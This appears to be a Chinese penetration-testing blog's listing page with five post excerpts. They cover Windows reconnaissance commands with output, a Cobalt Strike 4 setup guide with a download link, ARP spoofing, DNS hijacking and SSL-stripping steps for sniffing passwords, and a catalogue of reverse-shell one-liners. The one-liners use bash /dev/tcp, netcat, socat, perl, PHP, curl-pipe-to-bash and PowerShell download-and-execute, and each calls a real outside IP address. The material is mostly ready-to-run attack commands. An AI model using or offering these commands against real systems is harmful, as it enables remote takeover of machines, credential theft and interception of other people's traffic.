首页
相册
统计
留言
更多
网安工具
CTF工具
关于
Search
1
椭圆曲线加密算法原理(ECC)
5,324 阅读
2
SMBGhost(CVE-2020-0796)漏洞利用
4,302 阅读
3
关于gdb调试
4,065 阅读
4
Arduino使用CubeCell开发板进行LORA无线通信
3,852 阅读
5
Diffie-Hellman密钥协商算法
3,542 阅读
深度学习
技术随笔
应急响应
漏洞复现
流量分析
溯源
入侵检测
Linux
eBPF
服务配置
渗透测试
信息收集
横向攻击
密码学
web安全
CTF
登录
Search
标签搜索
单片机
密码学
Windows
BPF
Python
Linux
Mysql
APP开发
软考
Cobalt Strike
flutter
入侵检测
HSM's Blog
累计撰写
53
篇文章
累计收到
11
条评论
首页
栏目
深度学习
技术随笔
应急响应
漏洞复现
流量分析
溯源
入侵检测
Linux
eBPF
服务配置
渗透测试
信息收集
横向攻击
密码学
web安全
CTF
页面
相册
统计
留言
网安工具
CTF工具
关于
搜索到
5
篇与
的结果
2022-09-01
内网渗透之信息收集
内网渗透之信息收集Windows1. 检查当前shell权限whoami /user && whoami /priv2. 查看系统信息 C:\Users\hsm>systeminfo 主机名: HSM7D2A OS 名称: Microsoft Windows 11 家庭版 OS 版本: 10.0.22000 暂缺 Build 22000 OS 制造商: Microsoft Corporation OS 配置: 独立工作站 OS 构建类型: Multiprocessor Free 注册的所有人: HSM 注册的组织: 产品 ID: 00326-10000-00000-AA757 初始安装日期: 2022/7/29, 19:09:55 系统启动时间: 2022/9/1, 17:02:54 系统制造商: Parallels International GmbH. 系统型号: Parallels ARM Virtual Machine 系统类型: ARM64-based PC 处理器: 安装了 4 个处理器。 [01]: ARMv8 (64-bit) Family 8 Model 0 Revision 0 ~3200 Mhz [02]: ARMv8 (64-bit) Family 8 Model 0 Revision 0 ~3200 Mhz [03]: ARMv8 (64-bit) Family 8 Model 0 Revision 0 ~3200 Mhz [04]: ARMv8 (64-bit) Family 8 Model 0 Revision 0 ~3200 Mhz BIOS 版本: Parallels International GmbH. 17.1.4 (51567), 1601/1/1 Windows 目录: C:\Windows 系统目录: C:\Windows\system32 启动设备: \Device\HarddiskVolume2 系统区域设置: zh-cn;中文(中国) 输入法区域设置: en-us;英语(美国) 时区: (UTC+08:00) 伊尔库茨克 物理内存总量: 6,139 MB 可用的物理内存: 4,233 MB 虚拟内存: 最大值: 7,803 MB 虚拟内存: 可用: 6,076 MB 虚拟内存: 使用中: 1,727 MB 页面文件位置: C:\pagefile.sys 域: WORKGROUP 登录服务器: \\HSM7D2A 修补程序: 安装了 3 个修补程序。 [01]: KB5004342 [02]: KB5007215 [03]: KB5006755 网卡: 安装了 1 个 NIC。 [01]: Parallels VirtIO Ethernet Adapter 连接名: 以太网 启用 DHCP: 是 DHCP 服务器: 10.211.55.1 IP 地址 [01]: 10.211.55.5 [02]: fe80::6cb8:690a:5e23:f6a6 [03]: fdb2:2c26:f4e4:0:6c87:7c6d:e61:afb5 [04]: fdb2:2c26:f4e4:0:6cb8:690a:5e23:f6a6 Hyper-V 要求: 已检测到虚拟机监控程序。将不显示 Hyper-V 所需的功能。3. tcp/udp网络连接状态信息C:\Users\hsm>netstat -ano 活动连接 协议 本地地址 外部地址 状态 PID TCP 0.0.0.0:135 0.0.0.0:0 LISTENING 488 TCP 0.0.0.0:445 0.0.0.0:0 LISTENING 4 TCP 0.0.0.0:5040 0.0.0.0:0 LISTENING 5044 TCP 0.0.0.0:7680 0.0.0.0:0 LISTENING 3200 TCP 0.0.0.0:49664 0.0.0.0:0 LISTENING 776 TCP 0.0.0.0:49665 0.0.0.0:0 LISTENING 608 TCP 0.0.0.0:49666 0.0.0.0:0 LISTENING 1764 TCP 0.0.0.0:49667 0.0.0.0:0 LISTENING 2240 TCP 0.0.0.0:49668 0.0.0.0:0 LISTENING 2776 TCP 0.0.0.0:49670 0.0.0.0:0 LISTENING 752 TCP 10.211.55.5:139 0.0.0.0:0 LISTENING 4 TCP 10.211.55.5:49671 20.42.73.25:443 TIME_WAIT 0 TCP 10.211.55.5:49672 52.184.81.210:443 ESTABLISHED 4136 TCP 10.211.55.5:49673 202.89.233.100:443 ESTABLISHED 5996 TCP 10.211.55.5:49674 20.54.24.246:443 TIME_WAIT 0 TCP 10.211.55.5:49678 117.18.237.29:80 ESTABLISHED 7980 TCP 10.211.55.5:49681 117.18.237.29:80 ESTABLISHED 7844 TCP 10.211.55.5:49683 23.206.123.210:443 ESTABLISHED 3200 TCP 10.211.55.5:49684 23.206.123.210:443 ESTABLISHED 3200 TCP 10.211.55.5:49685 23.206.123.210:443 ESTABLISHED 3200 TCP 10.211.55.5:49687 40.64.66.113:443 TIME_WAIT 0 TCP 10.211.55.5:49689 52.137.108.250:443 TIME_WAIT 0 TCP 10.211.55.5:49690 52.137.108.250:443 TIME_WAIT 0 TCP 10.211.55.5:49691 23.33.32.73:80 ESTABLISHED 3200 TCP 10.211.55.5:49692 23.33.32.73:80 ESTABLISHED 3200 TCP 10.211.55.5:49693 111.174.1.43:80 ESTABLISHED 3200 TCP 10.211.55.5:49694 23.206.123.210:443 ESTABLISHED 3200 TCP 10.211.55.5:49698 23.206.123.210:443 ESTABLISHED 3200 TCP 10.211.55.5:49699 23.206.123.210:443 ESTABLISHED 3200 TCP 10.211.55.5:49700 23.206.123.210:443 ESTABLISHED 3200 TCP 10.211.55.5:49702 52.168.112.66:443 TIME_WAIT 0 TCP 10.211.55.5:49703 23.206.123.210:443 ESTABLISHED 3200 TCP 10.211.55.5:49704 104.127.167.59:443 ESTABLISHED 3200 TCP 10.211.55.5:49705 52.184.217.20:443 ESTABLISHED 3200 TCP 10.211.55.5:49706 23.206.123.210:443 ESTABLISHED 3200 TCP [::]:135 [::]:0 LISTENING 488 TCP [::]:445 [::]:0 LISTENING 4 TCP [::]:7680 [::]:0 LISTENING 3200 TCP [::]:49664 [::]:0 LISTENING 776 TCP [::]:49665 [::]:0 LISTENING 608 TCP [::]:49666 [::]:0 LISTENING 1764 TCP [::]:49667 [::]:0 LISTENING 2240 TCP [::]:49668 [::]:0 LISTENING 2776 TCP [::]:49670 [::]:0 LISTENING 752 UDP 0.0.0.0:5050 *:* 5044 UDP 0.0.0.0:5353 *:* 1812 UDP 0.0.0.0:5355 *:* 1812 UDP 0.0.0.0:51552 *:* 1812 UDP 0.0.0.0:51747 *:* 1812 UDP 0.0.0.0:55401 *:* 2636 UDP 0.0.0.0:62270 *:* 2636 UDP 10.211.55.5:137 *:* 4 UDP 10.211.55.5:138 *:* 4 UDP 127.0.0.1:62269 127.0.0.1:62269 3012 UDP [::]:5353 *:* 1812 UDP [::]:5355 *:* 1812 UDP [::]:51552 *:* 1812 UDP [::]:51747 *:* 1812 UDP [fe80::6cb8:690a:5e23:f6a6%3]:546 *:* 14324. 查看机器名C:\Users\hsm>hostname HSM7D2A5. 查看当前操作系统C:\Users\hsm>wmic OS get Caption,CSDVersion,OSArchitecture,Version Caption CSDVersion OSArchitecture Version Microsoft Windows 11 家庭版 ARM 64 位处理器 10.0.220006. 查杀软C:\Users\hsm>wmic /node:localhost /namespace:\\root\SecurityCenter2 path antiVirusProduct Get displayName /Format:List displayName=Windows Defender 7. 查看当前安装的程序C:\Users\hsm>wmic product get name,version Name Version 腾讯QQ 9.6.3.28774 Parallels Tools 17.1.4.51567 8. 查看在线用户C:\Users\hsm>whoami hsm7d2a\hsmC:\Users\hsm>echo %username% hsm9. 查看网络配置ipconfig /allC:\Users\hsm>ipconfig /all Windows IP 配置 主机名 . . . . . . . . . . . . . : HSM7D2A 主 DNS 后缀 . . . . . . . . . . . : 节点类型 . . . . . . . . . . . . : 混合 IP 路由已启用 . . . . . . . . . . : 否 WINS 代理已启用 . . . . . . . . . : 否 DNS 后缀搜索列表 . . . . . . . . : localdomain 以太网适配器 以太网: 连接特定的 DNS 后缀 . . . . . . . : localdomain 描述. . . . . . . . . . . . . . . : Parallels VirtIO Ethernet Adapter 物理地址. . . . . . . . . . . . . : 00-1C-42-64-78-47 DHCP 已启用 . . . . . . . . . . . : 是 自动配置已启用. . . . . . . . . . : 是 IPv6 地址 . . . . . . . . . . . . : fdb2:2c26:f4e4:0:6cb8:690a:5e23:f6a6(首选) 临时 IPv6 地址. . . . . . . . . . : fdb2:2c26:f4e4:0:6c87:7c6d:e61:afb5(首选) 本地链接 IPv6 地址. . . . . . . . : fe80::6cb8:690a:5e23:f6a6%3(首选) IPv4 地址 . . . . . . . . . . . . : 10.211.55.5(首选) 子网掩码 . . . . . . . . . . . . : 255.255.255.0 获得租约的时间 . . . . . . . . . : 2022年9月1日 17:03:00 租约过期的时间 . . . . . . . . . : 2022年9月1日 17:32:59 默认网关. . . . . . . . . . . . . : 10.211.55.1 DHCP 服务器 . . . . . . . . . . . : 10.211.55.1 DHCPv6 IAID . . . . . . . . . . . : 100670530 DHCPv6 客户端 DUID . . . . . . . : 00-01-00-01-2A-75-77-FF-00-1C-42-64-78-47 DNS 服务器 . . . . . . . . . . . : 10.211.55.1 TCPIP 上的 NetBIOS . . . . . . . : 已启用10. 查看进程tasklist /vC:\Users\hsm>tasklist /v 映像名称 PID 会话名 会话# 内存使用 状态 用户名 CPU 时间 窗口标题 ========================= ======== ================ =========== ============ =============== ================================================== ============ ======================================================================== System Idle Process 0 Services 0 8 K Unknown NT AUTHORITY\SYSTEM 0:40:52 暂缺 System 4 Services 0 328 K Unknown 暂缺 0:00:34 暂缺 Registry 124 Services 0 38,220 K Unknown 暂缺 0:00:01 暂缺 smss.exe 400 Services 0 1,480 K Unknown 暂缺 0:00:00 暂缺 csrss.exe 532 Services 0 6,980 K Unknown 暂缺 0:00:00 暂缺 wininit.exe 608 Services 0 8,260 K Unknown 暂缺 0:00:00 暂缺 csrss.exe 656 Console 1 38,140 K Running 暂缺 11. 查看当前登录域名C:\Users\hsm>net config workstation 计算机名 \\HSM7D2A 计算机全名 HSM7D2A 用户名 hsm 工作站正运行于 NetBT_Tcpip_{22218B69-1B1F-4512-88D4-937C30BF9CF9} (001C42647847) 软件版本 Windows 10 Home 工作站域 WORKGROUP 登录域 HSM7D2A COM 打开超时 (秒) 0 COM 发送计数 (字节) 16 COM 发送超时 (毫秒) 250 命令成功完成。 12. 查看远程桌面连接历史记录cmdkey /l13. 查看本机上的用户账户列表net userC:\Users\hsm>net user \\HSM7D2A 的用户帐户 ------------------------------------------------------------------------------- Administrator DefaultAccount Guest hsm WDAGUtilityAccount 命令成功完成。查看本机用户xxx信息net user xxxnet user administratorC:\Users\hsm>net user administrator 用户名 Administrator 全名 注释 管理计算机(域)的内置帐户 用户的注释 国家/地区代码 000 (系统默认值) 帐户启用 No 帐户到期 从不 上次设置密码 2022/7/30 10:09:48 密码到期 从不 密码可更改 2022/7/30 10:09:48 需要密码 No 用户可以更改密码 Yes 允许的工作站 All 登录脚本 用户配置文件 主目录 上次登录 从不 可允许的登录小时数 All 本地组成员 *Administrators 全局组成员 *None 命令成功完成。Linux
2022年09月01日
804 阅读
0 评论
0 点赞
2020-11-14
Cobalt Strike4(cs4)安装教程
1.简介Cobalt Strike是一款基于java的渗透测试神器,常被业界人称为CS神器。自3.0以后已经不在使用Metasploit框架而作为一个独立的平台使用,分为客户端与服务端,服务端是一个,客户端可以有多个,非常适合团队协同作战,多个攻击者可以同时连接到一个团队服务器上,共享攻击资源与目标信息和sessions,可模拟APT做模拟对抗,进行内网渗透。Cobalt Strike集成了端口转发、服务扫描,自动化溢出,多模式端口监听,win exe木马生成,win dll木马生成,java木马生成,office宏病毒生成,木马捆绑;钓鱼攻击包括:站点克隆,目标信息获取,java执行,浏览器自动攻击等等下载链接: https://pan.baidu.com/s/1phJ-RJePp12E-P0qXtyr6Q?pwd=cool 提取码: cool2. 目录结构| cobaltstrike_cn.bat 【CS Windows客户端启动程序(中文)】 | cobaltstrike_en.bat 【CS Windows客户端启动程序(英文)】 │ cobaltstrike.jar 【主体程序】 | cobaltStrikeCN.jar 【翻译插件】 │ teamserver 【Linux服务端启动程序(linux shell脚本)】 | teamserver.bat 【Windows服务端启动程序(windows bat批处理)】 |─third-party 第三方工具 【vnc远程功能的dll】 | README.vncdll.txt | winvnc.x64.dll 【vnc服务端dllx64位】 | winvnc.x86.dll 【vnc服务端dllx86位】 |—Win_Linux shell script.7z 一些脚本文件 Win_Linux shell script.7z里主要是是一些脚本无后缀名的是Linux版的.bat后缀的是Windows版的 │ agscript [拓展应用的脚本] │ c2lint [检查c2配置文件的语法和预览] | cobaltstrike [客户端启动程序] | peclone [用来解析dll] | teamserver [服务端启动程序]3. 运行服务端团队服务器最好运行在Linux平台上,cobaltstrike.jar既是服务端程序也是客户端程序,一般情况Linux用teamserver启动服务端,Windows一般用teamserver.bat启动服务端teamserver <host> <password> [/path/to/c2.profile] [YYYY-MM-DD] <host> is the (default) IP address of this Cobalt Strike team server <password> is the shared password to connect to this server [/path/to/c2.profile] is your Malleable C2 profile [YYYY-MM-DD] is a kill date for Beacon payloads run from this serverWindows和Linux通用这个命令,如果提示没有证书就按照提示创建证书,权限不够就以管理员权限运行。第一个参数为服务器监听IP地址 此选项为必填选项第二个参数为服务器连接密码客户端使用此密码连接服务器 此选项为必填选项第三个参数为Malleable C2 profile配置文件如果不使用可以不用填写 此选项为可选选项第四个参数为Beacon有效负载运行结束日期。如果设置此选项则CS生成的每个Beacon stage中都将嵌入此结束日期,Beacon payload在此日期后将拒绝运行,处于sleep状态的Beacon payload醒来后也将自动退出结束运行 此选项为可选选项PS:团队服务器默认连接端口为50050,如果你想修改端口只需修改teamserver文件4. 客户端Linux:java -Dfile.encoding=UTF-8 -javaagent:cobaltStrikecn.jar -XX:ParallelGCThreads=4 -XX:+AggressiveHeap -XX:+UseParallelGC -jar cobaltstrike.jarWindows:双击`cobaltstrike.exe`Mac 运行客户端:java -Dfile.encoding=UTF-8 -javaagent:/Users/hsm/SecFiles/CobaltStrike4.4/cobaltStrikecn.jar -XX:ParallelGCThreads=4 -XX:+AggressiveHeap -XX:+UseParallelGC -jar /Users/hsm/SecFiles/CobaltStrike4.4/cobaltstrike.jar输入服务端IP,端口默认50050,用户名任意,密码为之前设置的密码,点击connect。第一次连接会出现hash校验,这里的hash等于前面的启动teamserver时的hash,直接点击‘是’即可连接到团队服务器上。5. 菜单栏选项Cobalt StrikeNew Connection # 新建连接,支持连接多个服务器端 Preferences # 设置Cobal Strike界面、控制台、以及输出报告样式、TeamServer连接记录 Visualization # 主要展示输出结果的视图 VPN Interfaces # 设置VPN接口 Listenrs # 创建监听器 Script Manager # 脚本管理,可以通过AggressorScripts脚本来加强自身,能够扩展菜单栏,Beacon命令行,提权脚本等 Close # 退出连接ViewApplications # 显示受害主机的应用信息 Credentials # 显示所有以获取的受害主机的凭证,如hashdump、Mimikatz Downloads # 查看已下载文件 Event Log # 主机上线记录以及团队协作聊天记录 Keystrokes # 查看键盘记录结果 Proxy Pivots # 查看代理模块 Screenshots # 查看所有屏幕截图 Script Console # 加载第三方脚本以增强功能 Targets # 显示所有受害主机 Web Log # 所有Web服务的日志Attacks PackagesHTML Application # 生成(executable/VBA/powershell)这三种原理实现的恶意HTA木马文件 MS Office Macro # 生成office宏病毒文件 Payload Generator # 生成各种语言版本的payload USB/CD AutoPlay # 生成利用自动播放运行的木马文件 Windows Dropper # 捆绑器能够对任意的正常文件进行捆绑(免杀效果差) Windows Executable # 生成可执行exe木马 Windows Executable(Stageless) # 生成无状态的可执行exe木马Web Drive-byManage # 对开启的web服务进行管理 Clone Site # 克隆网站,可以记录受害者提交的数据 Host File # 提供文件下载,可以选择Mime类型 Scripted Web Delivery # 为payload提供web服务以便下载和执行,类似于Metasploit的web_delivery Signed Applet Attack # 使用java自签名的程序进行钓鱼攻击(该方法已过时) Smart Applet Attack # 自动检测java版本并进行攻击,针对Java 1.6.0_45以下以及Java 1.7.0_21以下版本(该方法已过时) System Profiler # 用来获取系统信息,如系统版本,Flash版本,浏览器版本等 Spear Phish # 鱼叉钓鱼邮件ReportingActivity Report # 活动报告 Hosts Report # 主机报告 Indicators of Compromise # IOC报告:包括C2配置文件的流量分析、域名、IP和上传文件的MD5 hashes Sessions Report # 会话报告 Social Engineering Report # 社会工程报告:包括鱼叉钓鱼邮件及点击记录 Tactics, Techniques, and Procedures # 战术技术及相关程序报告:包括行动对应的每种战术的检测策略和缓解策略 Reset Data # 重置数据 Export Data # 导出数据,导出.tsv文件格式HelpHomepage # 官方主页 Support # 技术支持 Arsenal # 开发者 System information # 版本信息 About # 关于工具栏1.新建连接 2.断开当前连接 3.监听器 4.改变视图为Pivot Graph(视图列表) 5.改变视图为Session Table(会话列表) 6.改变视图为Target Table(目标列表) 7.显示所有以获取的受害主机的凭证 8.查看已下载文件 9.查看键盘记录结果 10.查看屏幕截图 11.生成无状态的可执行exe木马 12.使用java自签名的程序进行钓鱼攻击 13.生成office宏病毒文件 14.为payload提供web服务以便下载和执行 15.提供文件下载,可以选择Mime类型 16.管理Cobalt Strike上运行的web服务 17.帮助 18.关于
2020年11月14日
770 阅读
0 评论
0 点赞
2020-10-07
中间人攻击之获取帐号密码
1. ettercap嗅探HTTP网站帐号密码ettercap是个“神器”,本文重点不在于此,故不去详细介绍。开启路由转发、arpspoof双向欺骗不多赘述,一切就绪之后,另一终端下使用如下命令:sudo ettercap -Tq -i wlo1T代表命令行界面而非GUI显示,q代表不显示数据包内容,i指定监听网卡。2. sslstrip+dns2proxy_hsts嗅探HTTPS网站帐号密码先把工具的链接奉上:sslstrip:Kali下自带;如果是其他Linux版本,使用sudo apt install sslstrip命令安装即可。sslstrip2 :作者因为某些原因删掉了原来的代码,这是我在另一处找到的。(你也可以选择使用sslstrip)dns2proxy_hsts嗅探HTTPS网站的帐号密码的思想就是将HTTPS降成HTTP,之后再嗅探HTTP网站的帐号密码。首先,在attacker本机上进行端口映射(有关iptables的知识可以参考这篇文章 ,本文重点不在于iptables): iptables --flush iptables --flush -t nat iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 8888 iptables -t nat -A PREROUTING -p udp --destination-port 53 -j REDIRECT --to-port 53前2条命令是在做清理工作,后2条命令才是进行端口映射。之后到dns2proxy_hsts目录下,执行(如果它依赖的dns库没有安装的话,使用sudo pip install dnspython安装即可):python2 dns2proxy.py
2020年10月07日
1,313 阅读
0 评论
0 点赞
2020-10-07
中间人攻击之dns劫持与ARP欺骗
1. 实验环境攻击系统:Manjaro Linux攻击机: 192.168.0.226目标主机:192.168.0.75网关:192.168.0.1无线网卡名称: wlp3s02. 网络扫描首先连接wifi,进入内网1,查看内网的存活主机命令fping -a -g 192.168.0.1/24 或者 nmap -sP 192.168.0.1/24 3. arp欺骗形如arpspoof -i <网卡接口>-t <目标的内网地址> <网关ip>命令:sudo arpspoof -i wlp3s0 -t 192.168.0.75 192.168.0.1上面一句就对192.168.0.75实施了欺骗 ,此时该主机是断网的4. 流量转发3,流量转发 我们将劫持到的流量通过自己发机器转发到受害人的机器上,让其恢复网络su - #改变用户为root,并使用root环境变量 echo 1 >/proc/sys/net/ipv4/ip_forward #将参数换为1默认为0,0为不转发,1为启用流量转发这时可以启用 wireshark 抓包工具进行抓包或者直接获取流量包sudo ettercap -Tq -i wlp3s0这样被人输入密码后,我们就可以直接看到。获取图片和浏览的网站sudo driftnet -i wlp3s0 sudo urlsnarf -i wlp3s05. dns劫持修改/etc/ettercap/etter.dns 添加自己的ip和劫持域名开始进行DNS欺骗攻击:sudo ettercap -i wlp3s0 -Tq -M arp:remote -P dns_spoof /192.168.0.75// /192.168.0.1//进行DNS 欺骗后,再次测试:ping www.baidu.com ,发现将www.baidu.com 解析指向了攻击者主机(192.168.0.226)
2020年10月07日
1,381 阅读
0 评论
0 点赞
2020-05-19
反弹shell介绍
一、 反弹shell简介反弹shell就是指由被控端(靶机/肉鸡)发起连接请求到主控端(攻击机),主控端需在被控端发起请求前提前进行端口监听,最终产生一个交互的会话过程就叫做反弹shell。反弹shell适用于如下几个场景:局域网内,无法直接连接被控端;目标机器的IP不断改变;由于策略限制,对方机器只能发送请求,无法直接接收请求。以下介绍下几种反弹shell的方式。二、 Bash反弹shellBash:Bash是一个命令处理器,通常运行于文本窗口中,并能执行用户直接输入的命令。VPS:nc -lvnp 8333靶机:bash -i >& /dev/tcp/43.138.236.131/8333 0>&1三、 Netcat反弹shellNetcat:NetCat是一个非常简单的Unix工具,可以读、写TCP或UDP网络连接(network connection)。它被设计成一个可靠的后端(back-end) 工具,能被其它的程序或脚本直接地或容易地驱动。VPS:nc -lvnp 8333靶机:nc 43.138.236.131 8333 -e bin/bash四、 Telnet反弹shellTelnet:Telnet协议是TCP/IP协议族中的一员,是Internet远程登录服务的标准协议和主要方式。它为用户提供了在本地计算机上完成远程主机工作的能力。VPS开启监听:nc -lvpn 8334客户端链接:mknod a p;telnet 43.138.236.131 8334 0<a | /bin/bash 1>a五、 Socat反弹shellSocat:Socat 是 Linux 下的一个多功能的网络工具,名字来由是 「Socket CAT」。其功能与有瑞士军刀之称的 Netcat 类似,可以看做是 Netcat 的加强版。Socat 并不是大多数Linux发行版本会预装的软件,需要手动进行安装yum install -y socat 或 apt-get install socatVPS:socat TCP-LISTEN:8333 –靶机:socat tcp-connect:43.138.236.131:8333 exec:'bash -li',pty,stderr,setsid,sigint,sane六、 Curl反弹shellCurl:Curl是一个利用URL语法在命令行下工作的文件传输工具,1997年首次发行。它支持文件上传和下载,所以是综合传输工具,但按传统,习惯称Curl为下载工具。Curl还包含了用于程序开发的libcurl。步骤:VPS:1、 创建index.html文件echo 'bash -c "bash -i >& /dev/tcp/43.138.236.131/8333 0>&1"' > index.html2、 开启http服务(与创建的文件同目录):python -m SimpleHTTPServer 83323、 开启监听:nc -lvnp 8333靶机:curl http://43.138.236.131:8332|bash七、 Perl反弹shellPerl:Perl一种功能丰富的计算机程序语言,运行在超过100种计算机平台上,适用广泛,从最初是为文本处理而开发的,现在用于各种任务,包括系统管理,Web开发,网络编程,GUI开发等。VPS:nc -lvnp 8333靶机:perl -e 'use Socket;$i="43.138.236.131";$p=8333;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/bash -i");};'八、 PHP反弹shellPHP:PHP(PHP: Hypertext Preprocessor)即“超文本预处理器”,是在服务器端执行的脚本语言,尤其适用于Web开发并可嵌入HTML中。VPS:nc -lvnp 8333靶机:php -r '$sock=fsockopen("43.138.236.131","8333");exec("/bin/sh -i <&3 >&3 2>&3");'十、 Powercat脚本反弹shellPowercat:Powercat是一个powershell函数。脚本下载地址:https://github.com/perlh/powercatVPSVPS上传Powershell脚本后开启http服务(python2版本):python -m SimpleHTTPServer 8332VPS开启端口监听:nc -lvnp 8333靶机靶机运行如下脚本即可看到VPS端收到反弹的会话(web服务的端口记得写)powershell IEX (New-Object System.Net.Webclient).DownloadString(‘http://43.138.236.131:8332/powercat.ps1‘); powercat -c 43.138.236.131 -p 8333 -e cmd十一、 Nishang脚本反弹shellNishang:Nishang是一个PowerShell攻击框架,它是PowerShell攻击脚本和有效载荷的一个集合。脚本下载地址:https://github.com/samratashok/nishangVPS上传nishang脚本后开启web服务:python -m SimpleHTTPServer 9933VPS开启服务端监听:nc -lvnp 10010靶机运行如下脚本即可看到VPS端收到反弹的会话(web服务的端口记得写)powershell IEX (New-Object Net.WebClient).DownloadString('http://43.138.236.131:9933/Shells/Invoke-PowerShellTcp.ps1');Invoke-PowerShellTcp -Reverse -IPAddress 43.138.236.131 -port 10010
2020年05月19日
945 阅读
0 评论
1 点赞